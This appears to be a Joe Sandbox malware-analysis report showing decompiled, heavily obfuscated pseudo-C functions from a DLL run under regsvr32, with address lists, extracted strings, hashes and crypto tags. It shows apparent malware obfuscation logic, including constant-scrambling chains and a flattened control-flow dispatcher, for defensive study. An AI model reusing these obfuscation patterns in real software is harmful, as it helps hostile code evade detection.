				_v40 = _v40 | 0xf036cc8d;
				_t205 = 0x3e;
				_v40 = _v40 * 0x42;
				_v40 = _v40 ^ 0x1fec8c25;
				_v64 = 0x4beacc;
				_v64 = _v64 | 0x61230c51;
				_v64 = _v64 ^ 0x6169d974;
				_v12 = 0xb410bf;
				_v12 = _v12 << 1;
				_v12 = _v12 << 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x410504f1;
				_v20 = 0xda0636;
				_v20 = _v20 / _t205;
				_t206 = 0x1d;
				_v20 = _v20 * 6;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x00a91204;
				_v36 = 0x29147c;
				_v36 = _v36 ^ 0x5f0b79a9;
				_v36 = _v36 * 0x61;
				_v36 = _v36 ^ 0x0c0e57ac;
				_v56 = 0x298fd5;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x77ad;
				_v56 = _v56 ^ 0x000ece69;
				_v76 = 0x4eb73b;
				_v76 = _v76 | 0xc39473de;
				_v76 = _v76 ^ 0xc3dd8af7;
				_v84 = 0x93dff7;
				_v84 = _v84 + 0xaf8e;
				_v84 = _v84 ^ 0x009ec664;
				_v60 = 0xe1f774;
				_v60 = _v60 | 0x8e5426bd;
				_v60 = _v60 * 0x4a;
				_v60 = _v60 ^ 0x5314dcbc;
				_v48 = 0xc28d25;
				_v48 = _v48 / _t206;
				_v48 = _v48 + 0xffffe4b0;
				_v48 = _v48 ^ 0x00086791;
				_v16 = 0xc89eea;
				_t207 = 0x4d;
				_v16 = _v16 * 0x38;
				_v16 = _v16 + 0xffff66e9;
				_v16 = _v16 / _t207;
				_v16 = _v16 ^ 0x009fb8f8;
				_v72 = 0x44adf7;
				_v72 = _v72 >> 2;
				_v72 = _v72 ^ 0x0013ec81;
				_v68 = 0xaa024b;
				_v68 = _v68 + 0xfffffe30;
				_v68 = _v68 ^ 0x00a2e0fb;
				_v8 = 0x256559;
				_v8 = _v8 | 0x74f4068e;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0x144d;
				_v8 = _v8 ^ 0x00e39f9e;
				_v80 = 0xcdfc62;
				_v80 = _v80 * 0x70;
				_v80 = _v80 ^ 0x5a1950d8;
				_v44 = 0xbfa22a;
				_v44 = _v44 << 0xd;
				_v44 = _v44 << 4;
				_v44 = _v44 ^ 0x4455e949;
				_v28 = 0x26e1c6;
				_v28 = _v28 + 0xffff89ea;
				_v28 = _v28 + 0x563f;
				_v28 = _v28 ^ 0x00220dbb;
				_v32 = 0x2a2295;
				_t208 = 0x4a;
				_v32 = _v32 / _t208;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x000f117b;
				_v24 = 0xa3dccc;
				_v24 = _v24 | 0xfc6a6bc5;
				_v24 = _v24 ^ 0x753c140e;
				_v24 = _v24 >> 0xc;
				_v24 = _v24 ^ 0x000472ed;
				_v52 = 0xc152ae;
				_v52 = _v52 + 0xffffb692;
				_v52 = _v52 ^ 0x030e2029;
				_v52 = _v52 ^ 0x03c3417b;
				_t194 =  *0x10024208; // 0x49d848
				_t197 = E1001589F(_v20, _v36, _a4 + 0x2c, E1000FFDE(_v40, _v64, _t194 + 0x210, _v12));
				_t239 = _t197;
				if(_t197 != 0) {
					_push(_v60);
					_push(_v84);
					_push(_v76);
					E1001734A(_v48, _t239, _v16, _v72, _v68,  &_v604, E10004BB4(0x10001200, _v56), _v8, _a8,  *((intOrPtr*)(_a8 + 0x10)));
					E1000B9D7(_v80, _v44, _t200, _v28);
					E10009EA8( &_v604, _v32, _v24, _v52);
				}
				return 1;
			}

0x100072d5
0x100072de
0x100072ec
0x100072ef
0x100072f2
0x100072f9
0x10007300
0x10007307
0x1000730e
0x10007315
0x10007318
0x1000731c
0x10007320
0x10007327
0x10007335
0x1000733c
0x1000733f
0x10007342
0x10007346
0x1000734d
0x10007354
0x1000735f
0x10007362
0x10007369
0x10007370
0x10007374
0x1000737b
0x10007382
0x10007389
0x10007390
0x10007397
0x1000739e
0x100073a5
0x100073ac
0x100073b3
0x100073be
0x100073c1
0x100073c8
0x100073d6
0x100073d9
0x100073e0
0x100073e7
0x100073f2
0x100073f3
0x100073f6
0x10007402
0x10007405
0x1000740c
0x10007413
0x10007417
0x1000741e
0x10007425
0x1000742c
0x10007433
0x1000743a
0x10007441
0x10007445
0x1000744c
0x10007453
0x1000745e
0x10007461
0x10007468
0x1000746f
0x10007475
0x10007479
0x10007480
0x10007487
0x1000748e
0x10007495
0x1000749c
0x100074a8
0x100074ab
0x100074ae
0x100074b1
0x100074b8
0x100074bf
0x100074c6
0x100074cd
0x100074d1
0x100074d8
0x100074df
0x100074e6
0x100074ed
0x100074f7
0x1000751b
0x10007523
0x10007525
0x10007528
0x10007530
0x10007533
0x10007563
0x10007572
0x10007586
0x1000758e
0x10007596

Strings

?V, xrefs: 1000748E
Ye%, xrefs: 10007433
IUD, xrefs: 10007479

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: ?V$IUD$Ye%
API String ID: 4033686569-3987338276
Opcode ID: e032331aa65bfc066005f324a396e82ebb84438269d7d455f14106908bdb887a
Instruction ID: 012d4188c5ff07e8a4e39d156950306bb3c897752fc04a030101a51a8a13bb2c
Opcode Fuzzy Hash: e032331aa65bfc066005f324a396e82ebb84438269d7d455f14106908bdb887a
Instruction Fuzzy Hash: 2081FFB1D01209EBCF18CFE5D98A8EEBBB1FF44314F208119E421B6264D7B45A56CF54

Uniqueness

Uniqueness Score: -1.00%

Function 10001865 Relevance: 3.9, Strings: 3, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E10001865(void* __eax, signed int __ebx, void* __ecx, signed int __edx, void* __esi, signed int __ebp, signed int _a12, signed int _a13, signed int _a17, signed int _a21, intOrPtr _a25, signed int _a29, signed int _a32, signed int _a33, signed int _a37, signed int _a41, void* _a45, signed int _a49) {
				signed int _v0;
				signed int _v32;
				void* _t111;
				void* _t112;
				void* _t116;
				signed char _t118;
				signed char _t126;
				signed char _t128;
				void* _t133;
				signed int _t134;
				signed int _t135;
				signed char _t138;
				signed int _t143;
				intOrPtr* _t147;
				signed int _t148;
				signed int _t150;
				signed int _t153;
				void* _t154;
				void* _t155;
				signed char _t159;
				void* _t161;
				signed int _t162;

				_t150 = __ebp;
				_t154 = __eax;
				_push(es);
				asm("stosb");
				asm("cdq");
				 *(__esi + 0x38) =  *(__esi + 0x38) ^ __ebx;
				asm("insd");
				asm("outsd");
				asm("in al, 0x95");
				_t147 = __esi + 1;
				_push(ss);
				_push(_t153 & 0x000000d2);
				_t106 = 0xd1;
				asm("ror ecx, 1");
				 *0xd1 =  *0xd1 + 0xd1;
				 *0xd1 =  *0xd1 + 0xd1;
				_t126 = _t143;
				_t133 = 0x52;
				_t138 = __edx |  *0x00000079 |  *0x0000007A;
				if(_t138 <= 0) {
					L11:
					asm("outsd");
					asm("stosb");
					asm("lock imul edi, [ecx-0x43], 0xffffff9f");
					_t143 = 0x2fb5a6ea;
					_t162 =  *(_t126 + 0x50) & 0x00000049;
					_pop(_t154);
					asm("rol byte [edx-0x20aa703], 1");
					goto L12;
				} else {
					_t119 = 0x226c3edb;
					_pop(_t147);
					 *((intOrPtr*)(0x226c3edb)) =  *((intOrPtr*)(0x226c3edb)) - _t143;
					asm("arpl [esi], ax");
					if( *((intOrPtr*)(0x226c3edb)) >= 0) {
						L8:
						asm("fistp dword [ecx]");
						asm("int1");
						_t106 =  *(_t119 + 1 - 0x4d4b858d) * 0xffffffdb;
						_t154 = _t154 + _t133;
						_pop(ds);
						_t143 = _t143 - 1;
						_t138 = 0x8500a362;
						_t134 =  *((intOrPtr*)(_t133 + 0x14));
						_pop(_t147);
						 *_t106 =  *_t106 + _t106;
						 *_t106 =  *_t106 + _t106;
						 *_t106 =  *_t106 + _t106;
						 *_t106 =  *_t106 + _t106;
						asm("iretd");
						asm("sbb byte [0x1d82de1c], 0x1c");
						asm("sbb eax, 0x1d82de1c");
						asm("sbb al, 0x8b");
						asm("out dx, al");
						if(_t161 >= 0) {
							goto L16;
						} else {
							asm("stosb");
							asm("in eax, 0x74");
							asm("outsd");
							_t126 = 0xaa4f6fe7;
							goto L11;
						}
					} else {
						 *(0x226c3edb + 0x71 + _t143 * 2) =  *(0x226c3edb + 0x71 + _t143 * 2) | _t138;
						_t128 = _t126 |  *(_t147 + 0x78);
						_t159 = _t128;
						if(_t159 >= 0) {
							L5:
							 *_t119 =  *_t119 + _t119;
							 *_t119 =  *_t119 + _t119;
							goto L6;
						} else {
							if(_t159 <= 0) {
								L12:
								_pop(ss);
								asm("arpl [esi-0x56ee98a9], sp");
								if(_t162 >= 0) {
									_t128 = _t126 |  *(_t147 + 0x7d);
									asm("insb");
									if(_t128 <= 0) {
										L6:
										 *_t106 =  *_t106 + _t106;
										 *_t106 =  *_t106 + _t106;
										_t118 = _t106 & 0x000000a8;
										_t161 = _t154 -  *_t147;
										_t150 = _t150 ^  *(_t118 - 0x24fed9c5);
										asm("a16 push esp");
										_t135 = _t133 + 1;
										asm("iretd");
										_t119 = _t118 - 1;
										_push(_t119);
										_push(_t147);
										asm("wait");
										 *_t119 =  *_t119 | _t135;
										_t133 = _t135 + 1;
										asm("rcr byte [esi+0x6], 1");
										_t126 = _t128;
										asm("sbb eax, [ecx+eax]");
										goto L8;
									} else {
										_t154 = _t154 - 0x28;
										_v32 = 0x5e1dcd;
										_t138 = 0xc2b5b2c;
										_v32 = _v32 ^ 0xc5450da8;
										_t106 = _v32 * 0x68;
										_push(_t128);
										L16:
										_push(_t150);
										_push(_t147);
										_push(_t143);
										_a12 = _t106;
										_t143 = _t134;
										_a12 = _a12 ^ 0x12fea908;
										_t150 = 0x2a0700f;
										_a32 = 0x2c896c;
										_t126 = 0xa3bf378;
										_a32 = _a32 * 0x75;
										_a32 = _a32 ^ 0x145380e5;
										_v0 = 0xedaa94;
										_t106 = _v0 * 0x60;
										_v0 = _v0 * 0x60;
									}
								}
							} else {
								_push(ds);
								asm("loopne 0x24");
								_t119 = _t138;
								 *_t143 = __eax;
								goto L5;
							}
						}
					}
				}
				_t155 = _t154 + 1;
				_a13 = _a13 << 0x10;
				_a13 = _a13 * 0x50;
				_a13 = _a13 ^ 0x580a3982;
				_a41 = 0x5e934b;
				_a41 = _a41 | 0x2f5aadd8;
				_a41 = _a41 ^ 0x2f596fc5;
				_a17 = 0xc2fac6;
				_a17 = _a17 << 3;
				_a17 = _a17 ^ 0x5dec7d11;
				_a17 = _a17 ^ 0x5a4b124a;
				_a17 = _a17 ^ 0x01bb61ed;
				_a49 = 0x54addb;
				_a49 = _a49 ^ 0x190194c7;
				_a49 = _a49 ^ 0x195f8313;
				_a29 = 0x3d3631;
				_t65 =  &_a29; // 0x3d3631
				_t148 = _a49;
				_a29 =  *_t65 * 0x28;
				_t68 =  &_a29; // 0x3d3631
				_a29 =  *_t68 * 0x36;
				_a29 = _a29 ^ 0x0478891a;
				_a37 = 0x953a09;
				_a37 = _a37 + 0xffffdf30;
				_a37 = _a37 >> 7;
				_a37 = _a37 ^ 0x00004a6a;
				_a33 = 0x144caa;
				_a33 = _a33 + 0xfaf0;
				_a33 = _a33 ^ 0x5acd916f;
				_a33 = _a33 ^ 0x5adb44b3;
				_a21 = 0x94ed39;
				_a21 = _a21 | 0xfffbfdfb;
				_a21 = _a21 ^ 0xfff0fb9b;
				do {
					while(_t138 != _t150) {
						if(_t138 == 0x554d29f) {
							_t134 = _t143 + 0x28;
							_t112 = E1000D532(_t134, _a17, _a49, _a29);
							_t155 = _t155 + 8;
							_t138 = _t150;
							_t148 = _t148 + _t112;
							continue;
						} else {
							if(_t138 == _t126) {
								_push(_t134);
								_push(_t134);
								_t116 = E10015958();
								_t155 = _t155 + 8;
								_t138 = 0x554d29f;
								_t148 = _t148 + _t116;
								continue;
							} else {
								if(_t138 == 0xc2b5b2c) {
									_t148 = _a25;
									_t138 = _t126;
									continue;
								}
							}
						}
						goto L26;
					}
					_t134 = _t143 + 0x38;
					_t111 = E1000D532(_t134, _a37, _a33, _a21);
					_t155 = _t155 + 8;
					_t138 = 0xcb59ab7;
					_t148 = _t148 + _t111;
					L26:
				} while (_t138 != 0xcb59ab7);
				return _t148;
			}

0x10001865
0x10001867
0x10001869
0x1000186a
0x1000186b
0x1000186e
0x10001871
0x10001872
0x10001873
0x10001876
0x10001877
0x10001878
0x1000187a
0x1000187c
0x10001880
0x10001882
0x10001884
0x10001888
0x10001889
0x1000188c
0x10001906
0x10001906
0x10001908
0x10001909
0x1000190e
0x10001913
0x10001917
0x10001918
0x00000000
0x1000188e
0x1000188e
0x10001893
0x10001894
0x10001896
0x10001898
0x100018cf
0x100018d1
0x100018d4
0x100018d6
0x100018dd
0x100018e1
0x100018e2
0x100018e3
0x100018e8
0x100018eb
0x100018ec
0x100018ee
0x100018f0
0x100018f2
0x100018f4
0x100018f5
0x100018f6
0x100018fb
0x100018fd
0x100018fe
0x00000000
0x10001900
0x10001900
0x10001901
0x10001903
0x10001904
0x00000000
0x10001904
0x1000189b
0x1000189b
0x1000189f
0x1000189f
0x100018a2
0x100018ac
0x100018ac
0x100018ae
0x00000000
0x100018a4
0x100018a4
0x1000191e
0x1000191e
0x1000191f
0x10001925
0x10001927
0x1000192a
0x1000192b
0x100018b0
0x100018b0
0x100018b2
0x100018b4
0x100018b6
0x100018b8
0x100018be
0x100018c0
0x100018c1
0x100018c2
0x100018c3
0x100018c4
0x100018c5
0x100018c6
0x100018c8
0x100018c9
0x100018cc
0x100018ce
0x00000000
0x1000192d
0x10001930
0x10001933
0x1000193b
0x10001940
0x10001948
0x1000194d
0x1000194e
0x1000194e
0x1000194f
0x10001950
0x10001951
0x10001955
0x10001957
0x1000195f
0x10001964
0x1000196c
0x10001976
0x1000197a
0x10001982
0x1000198a
0x1000198f
0x1000198f
0x1000192b
0x100018a6
0x100018a6
0x100018a7
0x100018a9
0x100018aa
0x00000000
0x100018aa
0x100018a4
0x100018a2
0x10001898
0x10001990
0x10001993
0x1000199d
0x100019a1
0x100019a9
0x100019b1
0x100019b9
0x100019c1
0x100019c9
0x100019ce
0x100019d6
0x100019de
0x100019e6
0x100019ee
0x100019f6
0x100019fe
0x10001a06
0x10001a0b
0x10001a0f
0x10001a13
0x10001a18
0x10001a1c
0x10001a24
0x10001a2c
0x10001a34
0x10001a39
0x10001a41
0x10001a49
0x10001a51
0x10001a59
0x10001a61
0x10001a69
0x10001a71
0x10001a79
0x10001a79
0x10001a83
0x10001abc
0x10001ac7
0x10001acc
0x10001acf
0x10001ad1
0x00000000
0x10001a85
0x10001a87
0x10001aa5
0x10001aa6
0x10001aa7
0x10001aac
0x10001aaf
0x10001ab4
0x00000000
0x10001a89
0x10001a8f
0x10001a91
0x10001a95
0x00000000
0x10001a95
0x10001a8f
0x10001a87
0x00000000
0x10001a83
0x10001ad9
0x10001ae4
0x10001ae9
0x10001aec
0x10001af1
0x10001af3
0x10001af3
0x10001b08

Strings

16=, xrefs: 100019FE
16=, xrefs: 10001A06, 10001A13
jJ, xrefs: 10001A39

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 16=$16=$jJ
API String ID: 0-3388153798
Opcode ID: 07621648d4f019e277faa7dedbae30ecff2f1360030425360a61620521a8b0ce
Instruction ID: e93a79a3fe0e329c17bdec63e2ebbe9deee26311f32b9fdd3965e608f42a8f5a
Opcode Fuzzy Hash: 07621648d4f019e277faa7dedbae30ecff2f1360030425360a61620521a8b0ce
Instruction Fuzzy Hash: 0251997150A3829FD345CF24859648BBFE0FF86358F554A9EE0C59B162C371DA0ACB93

Uniqueness

Uniqueness Score: -1.00%

Function 10003C51 Relevance: 3.9, Strings: 3, Instructions: 153
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10003C51(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t143;
				void* _t155;
				void* _t163;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				void* _t189;
				void* _t194;
				signed int* _t198;
				signed int* _t199;
				signed int* _t200;

				_t196 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E10009E7D(_t143);
				_v4 = _v4 & 0x00000000;
				_v16 = 0x574ff2;
				_v12 = 0xb82a91;
				_v8 = 0xba2320;
				_v28 = 0x86b78c;
				_t166 = 0x75;
				_v28 = _v28 / _t166;
				_v28 = _v28 ^ 0x000136c3;
				_v32 = 0x5ebda2;
				_v32 = _v32 >> 9;
				_v32 = _v32 ^ 0x00000f5e;
				_v72 = 0xdfe8af;
				_v72 = _v72 << 8;
				_v72 = _v72 ^ 0x18817a73;
				_t167 = 0x23;
				_v72 = _v72 * 0x5d;
				_v72 = _v72 ^ 0x71728a87;
				_v76 = 0x200c5b;
				_v76 = _v76 ^ 0x1959e0a3;
				_v76 = _v76 | 0x3151aabc;
				_v76 = _v76 / _t167;
				_v76 = _v76 ^ 0x01afce56;
				_v48 = 0x222512;
				_t168 = 0x66;
				_v48 = _v48 / _t168;
				_v48 = _v48 ^ 0x0008e564;
				_v68 = 0xa073a5;
				_v68 = _v68 + 0x68d3;
				_v68 = _v68 + 0xffffe21c;
				_v68 = _v68 * 0x68;
				_v68 = _v68 ^ 0x41474870;
				_v36 = 0x4110f3;
				_v36 = _v36 >> 1;
				_v36 = _v36 ^ 0x0022e96e;
				_v40 = 0x614700;
				_v40 = _v40 * 0xb;
				_v40 = _v40 ^ 0x042986e1;
				_v44 = 0x2db4e3;
				_v44 = _v44 | 0xe7b7ce00;
				_v44 = _v44 ^ 0xe7b50479;
				_v60 = 0xd37458;
				_v60 = _v60 | 0x04c0fa0b;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x269587af;
				_v20 = 0x2316c8;
				_v20 = _v20 ^ 0x161ac921;
				_v20 = _v20 ^ 0x1638279a;
				_v24 = 0x9a1d0c;
				_v24 = _v24 | 0xccb86747;
				_v24 = _v24 ^ 0xccb104a5;
				_v52 = 0x8100b5;
				_v52 = _v52 * 0x66;
				_v52 = _v52 ^ 0xf88b368b;
				_v52 = _v52 ^ 0xcbe914c7;
				_v56 = 0x829278;
				_v56 = _v56 << 0x10;
				_v56 = _v56 + 0x4827;
				_v56 = _v56 ^ 0x927f42f9;
				_v64 = 0x84592d;
				_v64 = _v64 | 0x92ae9040;
				_v64 = _v64 << 0xd;
				_v64 = _v64 | 0x3043e6be;
				_v64 = _v64 ^ 0xfb648528;
				_t169 = _v76;
				_t155 = E1000F501(_v76, _a16, _v48);
				_t163 = _t155;
				_t198 =  &(( &_v76)[7]);
				if(_t163 != 0) {
					_t189 = E10013FF6(_v32 | _v28, _v68, _v36, _v40, _v44, _t169, _v72,  *((intOrPtr*)(_t163 + 0x50)));
					_t199 =  &(_t198[6]);
					if(_t189 == 0) {
						L6:
						return _t189;
					}
					E10011D1C( *((intOrPtr*)(_t163 + 0x54)), _v60, _v20, _v24, _t189,  *_t196);
					_t200 =  &(_t199[4]);
					_t194 = ( *(_t163 + 0x14) & 0x0000ffff) + 0x18 + _t163;
					_t165 = ( *(_t163 + 6) & 0x0000ffff) * 0x28 + _t194;
					while(_t194 < _t165) {
						_t174 =  <  ?  *((void*)(_t194 + 8)) :  *((intOrPtr*)(_t194 + 0x10));
						E10011D1C( <  ?  *((void*)(_t194 + 8)) :  *((intOrPtr*)(_t194 + 0x10)), _v52, _v56, _v64,  *((intOrPtr*)(_t194 + 0xc)) + _t189,  *((intOrPtr*)(_t194 + 0x14)) +  *_t196);
						_t200 =  &(_t200[4]);
						_t194 = _t194 + 0x28;
					}
					goto L6;
				}
				return _t155;
			}

0x10003c56
0x10003c5a
0x10003c5b
0x10003c5f
0x10003c63
0x10003c67
0x10003c68
0x10003c6a
0x10003c6f
0x10003c76
0x10003c7e
0x10003c86
0x10003c8e
0x10003c9c
0x10003ca1
0x10003ca7
0x10003caf
0x10003cb7
0x10003cbc
0x10003cc4
0x10003ccc
0x10003cd1
0x10003cde
0x10003ce1
0x10003ce5
0x10003ced
0x10003cf5
0x10003cfd
0x10003d0d
0x10003d11
0x10003d19
0x10003d25
0x10003d28
0x10003d2c
0x10003d34
0x10003d3c
0x10003d44
0x10003d51
0x10003d55
0x10003d5d
0x10003d65
0x10003d69
0x10003d71
0x10003d7e
0x10003d82
0x10003d8a
0x10003d92
0x10003d9a
0x10003da2
0x10003daa
0x10003db2
0x10003db7
0x10003dbf
0x10003dc7
0x10003dcf
0x10003dd7
0x10003ddf
0x10003de7
0x10003def
0x10003dfc
0x10003e00
0x10003e08
0x10003e10
0x10003e18
0x10003e1f
0x10003e27
0x10003e2f
0x10003e37
0x10003e3f
0x10003e44
0x10003e4c
0x10003e58
0x10003e5c
0x10003e61
0x10003e63
0x10003e68
0x10003e94
0x10003e96
0x10003e9b
0x10003f00
0x00000000
0x10003f02
0x10003eb1
0x10003eba
0x10003ec4
0x10003ec9
0x10003efb
0x10003edf
0x10003ef0
0x10003ef5
0x10003ef8
0x10003ef8
0x00000000
0x10003eff
0x10003f08

Strings

'H, xrefs: 10003E1F
pHGA, xrefs: 10003D55
n", xrefs: 10003D69

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 'H$n"$pHGA
API String ID: 0-1895194431
Opcode ID: fd9c747e392041fd5eb50babe86453ec041cec62cb5834ecbf296cd0776ae259
Instruction ID: 46f28afc3970d71532bed81b2eb85205a28fc4ad8d3d5c5f12326cbb88dbec9d
Opcode Fuzzy Hash: fd9c747e392041fd5eb50babe86453ec041cec62cb5834ecbf296cd0776ae259
Instruction Fuzzy Hash: 3D714471008380ABD348CF65C98691BFBF1FBC4758F548A1CF58686260C3B2DA58CB06

Uniqueness

Uniqueness Score: -1.00%

Function 10001930 Relevance: 3.9, Strings: 3, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10001930(void* __ecx) {
				signed int _v3;
				void* _v7;
				signed int _v8;
				signed int _v11;
				signed int _v15;
				signed int _v19;
				signed int _v23;
				intOrPtr _v27;
				signed int _v28;
				signed int _v31;
				signed int _v35;
				signed int _v39;
				signed int _v40;
				signed int _t80;
				void* _t87;
				void* _t88;
				void* _t92;
				void* _t96;
				void* _t97;
				void* _t101;
				signed int _t104;
				signed int* _t110;

				_v28 = 0x5e1dcd;
				_t97 = 0xc2b5b2c;
				_v28 = _v28 ^ 0xc5450da8;
				_t80 = _v28 * 0x68;
				_v28 = _t80;
				_t101 = __ecx;
				_v28 = _v28 ^ 0x12fea908;
				_v8 = 0x2c896c;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x145380e5;
				_v40 = 0xedaa94;
				_v40 = _v40 * 0x60;
				_t110 =  &(( &_v40)[0]);
				_v39 = _v39 << 0x10;
				_v39 = _v39 * 0x50;
				_v39 = _v39 ^ 0x580a3982;
				_v11 = 0x5e934b;
				_v11 = _v11 | 0x2f5aadd8;
				_v11 = _v11 ^ 0x2f596fc5;
				_v35 = 0xc2fac6;
				_v35 = _v35 << 3;
				_v35 = _v35 ^ 0x5dec7d11;
				_v35 = _v35 ^ 0x5a4b124a;
				_v35 = _v35 ^ 0x01bb61ed;
				_v3 = 0x54addb;
				_v3 = _v3 ^ 0x190194c7;
				_v3 = _v3 ^ 0x195f8313;
				_v23 = 0x3d3631;
				_t42 =  &_v23; // 0x3d3631
				_t104 = _v3;
				_v23 =  *_t42 * 0x28;
				_t45 =  &_v23; // 0x3d3631
				_v23 =  *_t45 * 0x36;
				_v23 = _v23 ^ 0x0478891a;
				_v15 = 0x953a09;
				_v15 = _v15 + 0xffffdf30;
				_v15 = _v15 >> 7;
				_v15 = _v15 ^ 0x00004a6a;
				_v19 = 0x144caa;
				_v19 = _v19 + 0xfaf0;
				_v19 = _v19 ^ 0x5acd916f;
				_v19 = _v19 ^ 0x5adb44b3;
				_v31 = 0x94ed39;
				_v31 = _v31 | 0xfffbfdfb;
				_v31 = _v31 ^ 0xfff0fb9b;
				do {
					while(_t97 != 0x2a0700f) {
						if(_t97 == 0x554d29f) {
							_t96 = _t101 + 0x28;
							_t88 = E1000D532(_t96, _v35, _v3, _v23);
							_t110 =  &(_t110[2]);
							_t97 = 0x2a0700f;
							_t104 = _t104 + _t88;
							continue;
						} else {
							if(_t97 == 0xa3bf378) {
								_push(_t96);
								_push(_t96);
								_t92 = E10015958();
								_t110 =  &(_t110[2]);
								_t97 = 0x554d29f;
								_t104 = _t104 + _t92;
								continue;
							} else {
								if(_t97 == 0xc2b5b2c) {
									_t104 = _v27;
									_t97 = 0xa3bf378;
									continue;
								}
							}
						}
						goto L11;
					}
					_t96 = _t101 + 0x38;
					_t87 = E1000D532(_t96, _v15, _v19, _v31);
					_t110 =  &(_t110[2]);
					_t97 = 0xcb59ab7;
					_t104 = _t104 + _t87;
					L11:
				} while (_t97 != 0xcb59ab7);
				return _t104;
			}

0x10001933
0x1000193b
0x10001940
0x10001948
0x10001951
0x10001955
0x10001957
0x10001964
0x10001976
0x1000197a
0x10001982
0x1000198f
0x10001990
0x10001993
0x1000199d
0x100019a1
0x100019a9
0x100019b1
0x100019b9
0x100019c1
0x100019c9
0x100019ce
0x100019d6
0x100019de
0x100019e6
0x100019ee
0x100019f6
0x100019fe
0x10001a06
0x10001a0b
0x10001a0f
0x10001a13
0x10001a18
0x10001a1c
0x10001a24
0x10001a2c
0x10001a34
0x10001a39
0x10001a41
0x10001a49
0x10001a51
0x10001a59
0x10001a61
0x10001a69
0x10001a71
0x10001a79
0x10001a79
0x10001a83
0x10001abc
0x10001ac7
0x10001acc
0x10001acf
0x10001ad1
0x00000000
0x10001a85
0x10001a87
0x10001aa5
0x10001aa6
0x10001aa7
0x10001aac
0x10001aaf
0x10001ab4
0x00000000
0x10001a89
0x10001a8f
0x10001a91
0x10001a95
0x00000000
0x10001a95
0x10001a8f
0x10001a87
0x00000000
0x10001a83
0x10001ad9
0x10001ae4
0x10001ae9
0x10001aec
0x10001af1
0x10001af3
0x10001af3
0x10001b08

Strings

16=, xrefs: 100019FE
16=, xrefs: 10001A06, 10001A13
jJ, xrefs: 10001A39

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 16=$16=$jJ
API String ID: 0-3388153798
Opcode ID: 6bf733c641d5fef72255929081db0bc2e0d92093d004501da7878e237378267c
Instruction ID: 3703c7c87ae761c944956c506a6e48c6e3eab260fddc2c32f17f771232f5fa7d
Opcode Fuzzy Hash: 6bf733c641d5fef72255929081db0bc2e0d92093d004501da7878e237378267c
Instruction Fuzzy Hash: B34136716093829FC348CF21998140FBBE0FBD8798F505E1DF49AA6224D375DA498F97

Uniqueness

Uniqueness Score: -1.00%

Function 100018F6 Relevance: 3.8, Strings: 3, Instructions: 87
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E100018F6(signed int __eax, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a5, signed int _a9, signed int _a13, signed int _a16, intOrPtr _a17, signed int _a21, signed int _a25, signed int _a29, signed int _a33, signed int _a36, void* _a37, signed int _a41) {
				signed int _v20;
				void* _t97;
				void* _t98;
				void* _t102;
				signed char _t104;
				signed int* _t105;
				signed char _t110;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t124;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				signed int _t142;

				L0:
				while(1) {
					L0:
					_t128 = __esi;
					_t123 = __edi;
					_t115 = __ecx;
					_t90 = __eax;
					asm("sbb eax, 0x1d82de1c");
					asm("sbb al, 0x8b");
					asm("out dx, al");
					if(__eflags >= 0) {
						break;
					}
					L4:
					asm("stosb");
					asm("in eax, 0x74");
					asm("outsd");
